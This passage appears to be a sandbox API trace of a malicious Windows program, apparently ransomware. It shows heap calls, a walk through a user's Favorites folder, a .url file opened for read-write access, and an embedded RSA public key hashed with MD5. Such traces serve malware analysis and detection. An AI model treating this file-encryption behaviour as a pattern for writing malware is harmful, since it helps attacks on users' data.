hHeap=0x2c0000) returned 1 [0194.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.667] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\") returned="Windows Live\\" [0194.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0194.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24a0 [0194.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.667] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0194.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae24a0 | out: hHeap=0x2c0000) returned 1 [0194.668] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.668] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.668] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.668] PathFindFileNameW (pszPath="") returned="" [0194.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.669] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0194.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.670] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.670] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0194.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0194.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.671] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0194.671] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.671] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.671] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.675] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.675] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.677] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.677] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.677] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.678] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.678] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.678] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.679] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.679] GetLastError () returned 0x0 [0194.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.679] GetLastError () returned 0x0 [0194.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 